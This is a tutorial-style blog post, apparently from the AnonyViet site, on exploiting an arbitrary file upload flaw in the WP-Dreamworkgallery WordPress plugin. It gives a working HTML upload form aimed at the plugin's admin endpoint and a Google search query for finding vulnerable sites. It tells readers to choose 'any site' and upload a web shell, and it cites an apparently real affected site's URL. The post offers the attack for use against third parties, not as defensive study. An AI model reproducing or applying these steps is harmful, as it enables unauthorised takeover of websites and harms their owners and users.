• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result

Exploiting the WordPress Plugin WP-Dreamworkgallery Vulnerability

AnonyViet by AnonyViet
January 30, 2023
in Security
0

This bug allows us to comfortably UpShell via a .html file right from localhost

Join the channel Telegram of the AnonyViet 👉 Link 👈

https://www.youtube.com/watch?v=P_ejHXYtwY0

Step 1: Create a file Upload.html

<html>
<body>
<form action="http://www.web-bị-lỗi.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Step 2: Find the wrong Web

Find the error by going to Google.com and typing the command

inurl:/wp-content/plugins/wp-dreamworkgallery/

Step 3: Choose any site

Replace the broken website link in the code in Step 1, remember to save it

Exploiting WordPress Plugin Vulnerability WP-Dreamworkgallery 3

Step 4: Up Shell

Open File Upload.html in Step 1 up, and Up Shell up

Note: The error after Up shell

Exploiting the WordPress Plugin Vulnerability WP-Dreamworkgallery 4

Copy this line to the broken site Link is OK

http://www.pressprint.rs/wp-content/uploads/dreamwork/334_uploadfolder/big/1.html

The article achieved: 5/5 – (100 votes)

Tags: exploitingPluginvulnerabilityWordpressWPDreamworkgallery
Previous Post

Kinh nghiệm mua Laptop cho sinh viên nhóm ngành kế toán, kinh tế, xã hội…

 Next Post

Instructions to make iPhone freeze with Text Bomb containing Sindhi language
AnonyViet

AnonyViet

Related Posts

How to intercept traffic using Burp Suite to analyze HTTP/HTTPS
Security

How to intercept traffic using Burp Suite to analyze HTTP/HTTPS

April 18, 2026
How to use hackers use Splitfus to execute PowerShell malicious code
Security

How to use hackers use Splitfus to execute PowerShell malicious code

July 20, 2025
How to implement Shellcode Injection attack technique with Autoit
Security

How to implement Shellcode Injection attack technique with Autoit

March 14, 2025
How to exploit the holy hole of Hijacking on Windows
Security

How to exploit the holy hole of Hijacking on Windows

March 8, 2025
Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery
Security

Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery

February 10, 2025
Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile
Security

Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile

December 14, 2024
Next Post
Instructions to make iPhone freeze with Text Bomb containing Sindhi language

Instructions to make iPhone freeze with Text Bomb containing Sindhi language

0 0 votes
Article Rating
Subscribe
Login
Notify of
guest

guest

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Recent News

Reputable LG repair service in Hanoi & Ho Chi Minh City with LGservicecenter

Reputable LG repair service in Hanoi & Ho Chi Minh City with LGservicecenter

April 21, 2026
Japanese Watch Week: Choose the color that suits your destiny, start the new year well at Mobile World

Japanese Watch Week: Choose the color that suits your destiny, start the new year well at Mobile World

April 20, 2026
4K Video Downloader Plus – Tool to download YouTube videos on macOS

4K Video Downloader Plus – Tool to download YouTube videos on macOS

April 20, 2026
How to add Watermark to Google Docs to protect copyright

How to add Watermark to Google Docs to protect copyright

April 19, 2026
Reputable LG repair service in Hanoi & Ho Chi Minh City with LGservicecenter

Reputable LG repair service in Hanoi & Ho Chi Minh City with LGservicecenter

April 21, 2026
Japanese Watch Week: Choose the color that suits your destiny, start the new year well at Mobile World

Japanese Watch Week: Choose the color that suits your destiny, start the new year well at Mobile World

April 20, 2026
4K Video Downloader Plus – Tool to download YouTube videos on macOS

4K Video Downloader Plus – Tool to download YouTube videos on macOS

April 20, 2026
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

Reputable LG repair service in Hanoi & Ho Chi Minh City with LGservicecenter

Reputable LG repair service in Hanoi & Ho Chi Minh City with LGservicecenter

April 21, 2026
Japanese Watch Week: Choose the color that suits your destiny, start the new year well at Mobile World

Japanese Watch Week: Choose the color that suits your destiny, start the new year well at Mobile World

April 20, 2026
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply